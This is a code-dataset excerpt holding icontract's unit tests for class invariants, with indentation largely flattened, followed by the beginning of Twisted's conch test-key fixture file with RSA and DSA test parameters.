try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_first_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_last_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x < 10:
self was an instance of SomeClass
self.x was 100"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_after_pre(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.require(lambda y: y > 0)
def some_method(self, y: int) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method(y=-1)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
y > 0:
self was an instance of SomeClass
y was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
violation_error = None
try:
inst = SomeClass()
inst.some_method(y=100)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_ok_but_post_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = 10
return -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
result > 0:
result was -1
self was an instance of SomeClass"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_but_post_ok(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = -1
return 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_with_empty_arguments(self) -> None:
z = 42
@icontract.invariant(lambda: z != 42)
class A:
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = A()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
z != 42:
self was an instance of A
z was 42"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function(self) -> None:
def some_condition(self: 'A') -> bool:
return self.x > 0
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
# Valid call
a = A()
# Invalid call
violation_error = None # type: Optional[icontract.ViolationError]
try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function_with_default_argument_value(self) -> None:
def some_condition(self: 'A', y: int = 0) -> bool:
return self.x > y
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
# Valid call
a = A()
# Invalid call
violation_error = None # type: Optional[icontract.ViolationError]
try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
class TestProperty(unittest.TestCase):
def test_property_getter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
self.toggled = True
return 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_setter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.setter
def some_prop(self, value: int) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None # type: Optional[icontract.ViolationError]
try:
some_inst.some_prop = 0
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_deleter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.deleter
def some_prop(self) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None # type: Optional[icontract.ViolationError]
try:
del some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
class TestError(unittest.TestCase):
def test_as_type(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=ValueError)
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of A
self.x was 0"""), tests.error.wo_mandatory_location(str(value_error)))
def test_as_function(self) -> None:
@icontract.invariant(
lambda self: self.x > 0, error=lambda self: ValueError("x must be positive, but got: {}".format(self.x)))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive, but got: 0', str(value_error))
def test_as_function_with_empty_args(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=lambda: ValueError("x must be positive"))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive', str(value_error))
class TestToggling(unittest.TestCase):
def test_disabled(self) -> None:
@icontract.invariant(lambda self: self.x > 0, enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = -1
inst = SomeClass()
self.assertEqual(-1, inst.x)
class TestBenchmark(unittest.TestCase):
@unittest.skip("Skipped the benchmark, execute manually on a prepared benchmark machine.")
def test_benchmark_when_disabled(self) -> None:
def some_long_condition() -> bool:
time.sleep(5)
return True
@icontract.invariant(lambda self: some_long_condition(), enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = 100
class AnotherClass:
def __init__(self) -> None:
self.x = 100
start = time.time()
_ = SomeClass()
duration_with_inv = time.time() - start
start = time.time()
_ = AnotherClass()
duration_wo_inv = time.time() - start
self.assertLess(duration_with_inv / duration_wo_inv, 1.2)
class TestInvalid(unittest.TestCase):
def test_with_invalid_arguments(self) -> None:
val_err = None # type: Optional[ValueError]
try:
@icontract.invariant(lambda self, z: self.x > z)
class _:
def __init__(self) -> None:
self.x = 100
except ValueError as err:
val_err = err
self.assertIsNotNone(val_err)
self.assertEqual("Expected an invariant condition with at most an argument 'self', but got: ['self', 'z']",
str(val_err))
def test_no_boolyness(self) -> None:
@icontract.invariant(lambda self: tests.mock.NumpyArray([True, False]))
class A:
def __init__(self) -> None:
pass
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertEqual('Failed to negate the evaluation of the condition.',
tests.error.wo_mandatory_location(str(value_error)))
if __name__ == '__main__':
unittest.main()
| 32.214458 | 117 | 0.559803 | import textwrap
import time
import unittest
from typing import Dict, Iterator, Mapping, Optional, Any, NamedTuple
import icontract
import tests.error
import tests.mock
class TestOK(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_instance_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
inst.some_method()
self.assertEqual(1000, inst.x)
def test_unbound_instance_method_with_self_as_kwarg(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
func = inst.some_method.__func__
func(self=inst)
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = 1000
inst = SomeClass()
inst()
self.assertEqual(1000, inst.x)
def test_class_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@classmethod
def some_class_method(cls) -> None:
pass
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_static_method(self) -> None:
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
_ = A()
def test_inherited_static_method(self) -> None:
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
class B(A):
pass
_ = B()
def test_protected_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def _some_protected_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_protected_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def _some_protected_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_private_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __some_private_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_private_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __some_private_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
    def test_inv_with_empty_arguments(self) -> None:
        z = 42
@icontract.invariant(lambda: z == 42)
class A:
pass
_ = A()
def test_no_dict_pollution(self) -> None:
testSelf = self
@icontract.invariant(lambda self: self.mustHold())
class A:
def mustHold(self) -> bool:
testSelf.assertDictEqual({}, self.__dict__)
return True
_ = A()
def test_new_exempted(self) -> None:
new_call_counter = 0
init_call_counter = 0
@icontract.invariant(lambda self: True)
class Foo:
            def __new__(cls, *args, **kwargs) -> 'Foo':
                nonlocal new_call_counter
new_call_counter += 1
return super(Foo, cls).__new__(cls)
def __init__(self) -> None:
nonlocal init_call_counter
init_call_counter += 1
_ = Foo()
self.assertEqual(1, new_call_counter)
self.assertEqual(1, init_call_counter)
def test_subclass_of_generic_mapping(self) -> None:
counter = 0
def increase_counter(self: Any) -> bool:
nonlocal counter
counter += 1
return True
@icontract.invariant(increase_counter)
class Foo(Mapping[str, int]):
def __init__(self, table: Dict[str, int]) -> None:
self._table = table
def __getitem__(self, key: str) -> int:
return self._table[key]
def __iter__(self) -> Iterator[str]:
return iter(self._table)
def __len__(self) -> int:
return len(self._table)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self._table)
        f = Foo({'a': 1})
        _ = f['a']
        _ = iter(f)
        _ = len(f)
        _ = str(f)
self.assertEqual(9, counter)
class TestViolation(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self, x: int) -> None:
self.x = x
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
_ = SomeClass(x=1)
        violation_error = None
        try:
_ = SomeClass(x=0)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was 0"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_as_precondition(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
inst = SomeClass()
inst.x = -1
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
inst = SomeClass()
inst()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_first_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_last_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x < 10:
self was an instance of SomeClass
self.x was 100"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_after_pre(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.require(lambda y: y > 0)
def some_method(self, y: int) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
inst = SomeClass()
inst.some_method(y=-1)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
y > 0:
self was an instance of SomeClass
y was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
violation_error = None
try:
inst = SomeClass()
inst.some_method(y=100)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_ok_but_post_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = 10
return -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
result > 0:
result was -1
self was an instance of SomeClass"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_but_post_ok(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = -1
return 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_with_empty_arguments(self) -> None:
z = 42
@icontract.invariant(lambda: z != 42)
class A:
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        violation_error = None
        try:
_ = A()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
z != 42:
self was an instance of A
z was 42"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function(self) -> None:
def some_condition(self: 'A') -> bool:
return self.x > 0
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
a = A()
        violation_error = None
        try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function_with_default_argument_value(self) -> None:
def some_condition(self: 'A', y: int = 0) -> bool:
return self.x > y
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
a = A()
        violation_error = None
        try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
class TestProperty(unittest.TestCase):
def test_property_getter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
self.toggled = True
return 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
        violation_error = None
        try:
_ = some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_setter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.setter
def some_prop(self, value: int) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
        violation_error = None
        try:
some_inst.some_prop = 0
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_deleter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.deleter
def some_prop(self) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
        violation_error = None
        try:
del some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
class TestError(unittest.TestCase):
def test_as_type(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=ValueError)
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        value_error = None
        try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of A
self.x was 0"""), tests.error.wo_mandatory_location(str(value_error)))
def test_as_function(self) -> None:
@icontract.invariant(
lambda self: self.x > 0, error=lambda self: ValueError("x must be positive, but got: {}".format(self.x)))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        value_error = None
        try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive, but got: 0', str(value_error))
def test_as_function_with_empty_args(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=lambda: ValueError("x must be positive"))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
        value_error = None
        try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive', str(value_error))
class TestToggling(unittest.TestCase):
def test_disabled(self) -> None:
@icontract.invariant(lambda self: self.x > 0, enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = -1
inst = SomeClass()
self.assertEqual(-1, inst.x)
class TestBenchmark(unittest.TestCase):
@unittest.skip("Skipped the benchmark, execute manually on a prepared benchmark machine.")
def test_benchmark_when_disabled(self) -> None:
def some_long_condition() -> bool:
time.sleep(5)
return True
@icontract.invariant(lambda self: some_long_condition(), enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = 100
class AnotherClass:
def __init__(self) -> None:
self.x = 100
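        # Time the construction of the decorated-but-disabled class against an
        # identical plain class; a disabled invariant is expected to add at
        # most 20% overhead.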
start = time.time()
_ = SomeClass()
duration_with_inv = time.time() - start
start = time.time()
_ = AnotherClass()
duration_wo_inv = time.time() - start
self.assertLess(duration_with_inv / duration_wo_inv, 1.2)
class TestInvalid(unittest.TestCase):
def test_with_invalid_arguments(self) -> None:
        val_err = None
        try:
@icontract.invariant(lambda self, z: self.x > z)
class _:
def __init__(self) -> None:
self.x = 100
except ValueError as err:
val_err = err
self.assertIsNotNone(val_err)
self.assertEqual("Expected an invariant condition with at most an argument 'self', but got: ['self', 'z']",
str(val_err))
def test_no_boolyness(self) -> None:
@icontract.invariant(lambda self: tests.mock.NumpyArray([True, False]))
class A:
def __init__(self) -> None:
pass
        value_error = None
        try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertEqual('Failed to negate the evaluation of the condition.',
tests.error.wo_mandatory_location(str(value_error)))
if __name__ == '__main__':
unittest.main()
| true | true |
1c4a74a5b3ae9815d30ff73f4c0fa8d735514d1e | 27,110 | py | Python | src/twisted/conch/test/keydata.py | seanicus64/twisted | c0f1394c7bfb04d97c725a353a1f678fa6a1c602 | ["MIT", "Unlicense"] | 32 | 2019-11-14T07:49:33.000Z | 2022-02-16T00:49:22.000Z | src/twisted/conch/test/keydata.py | seanicus64/twisted | c0f1394c7bfb04d97c725a353a1f678fa6a1c602 | ["MIT", "Unlicense"] | 9 | 2019-09-06T18:21:59.000Z | 2022-01-13T03:04:11.000Z | src/twisted/conch/test/keydata.py | seanicus64/twisted | c0f1394c7bfb04d97c725a353a1f678fa6a1c602 | ["MIT", "Unlicense"] | 16 | 2019-06-25T13:26:43.000Z | 2022-03-07T07:29:12.000Z |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
# pylint: disable=I0011,C0103,W9401,W9402
"""
Data used by test_keys as well as others.
"""
from __future__ import absolute_import, division
from twisted.python.compat import long, _b64decodebytes as decodebytes
RSAData = {
'n': long('269413617238113438198661010376758399219880277968382122687862697'
'296942471209955603071120391975773283844560230371884389952067978'
'789684135947515341209478065209455427327369102356204259106807047'
'964139525310539133073743116175821417513079706301100600025815509'
'786721808719302671068052414466483676821987505720384645561708425'
'794379383191274856941628512616355437197560712892001107828247792'
'561858327085521991407807015047750218508971611590850575870321007'
'991909043252470730134547038841839367764074379439843108550888709'
'430958143271417044750314742880542002948053835745429446485015316'
'60749404403945254975473896534482849256068133525751'),
'e': long(65537),
'd': long('420335724286999695680502438485489819800002417295071059780489811'
'840828351636754206234982682752076205397047218449504537476523960'
'987613148307573487322720481066677105211155388802079519869249746'
'774085882219244493290663802569201213676433159425782937159766786'
'329742053214957933941260042101377175565683849732354700525628975'
'239000548651346620826136200952740446562751690924335365940810658'
'931238410612521441739702170503547025018016868116037053013935451'
'477930426013703886193016416453215950072147440344656137718959053'
'897268663969428680144841987624962928576808352739627262941675617'
'7724661940425316604626522633351193810751757014073'),
'p': long('152689878451107675391723141129365667732639179427453246378763774'
'448531436802867910180261906924087589684175595016060014593521649'
'964959248408388984465569934780790357826811592229318702991401054'
'226302790395714901636384511513449977061729214247279176398290513'
'085108930550446985490864812445551198848562639933888780317'),
'q': long('176444974592327996338888725079951900172097062203378367409936859'
'072670162290963119826394224277287608693818012745872307600855894'
'647300295516866118620024751601329775653542084052616260193174546'
'400544176890518564317596334518015173606460860373958663673307503'
'231977779632583864454001476729233959405710696795574874403'),
'u': long('936018002388095842969518498561007090965136403384715613439364803'
'229386793506402222847415019772053080458257034241832795210460612'
'924445085372678524176842007912276654532773301546269997020970818'
'155956828553418266110329867222673040098885651348225673298948529'
'93885224775891490070400861134282266967852120152546563278')
}
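# Hedged consistency checks for the fixture above (a sketch, not part of the
# original data; it assumes the components form a valid RSA key and that 'u'
# is a CRT coefficient, i.e. the inverse of one prime modulo the other):
#
#     assert RSAData['p'] * RSAData['q'] == RSAData['n']
#     assert ((RSAData['u'] * RSAData['q']) % RSAData['p'] == 1 or
#             (RSAData['u'] * RSAData['p']) % RSAData['q'] == 1)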
DSAData = {
'g': long("10253261326864117157640690761723586967382334319435778695"
"29171533815411392477819921538350732400350395446211982054"
"96512489289702949127531056893725702005035043292195216541"
"11525058911428414042792836395195432445511200566318251789"
"10575695836669396181746841141924498545494149998282951407"
"18645344764026044855941864175"),
'p': long("10292031726231756443208850082191198787792966516790381991"
"77502076899763751166291092085666022362525614129374702633"
"26262930887668422949051881895212412718444016917144560705"
"45675251775747156453237145919794089496168502517202869160"
"78674893099371444940800865897607102159386345313384716752"
"18590012064772045092956919481"),
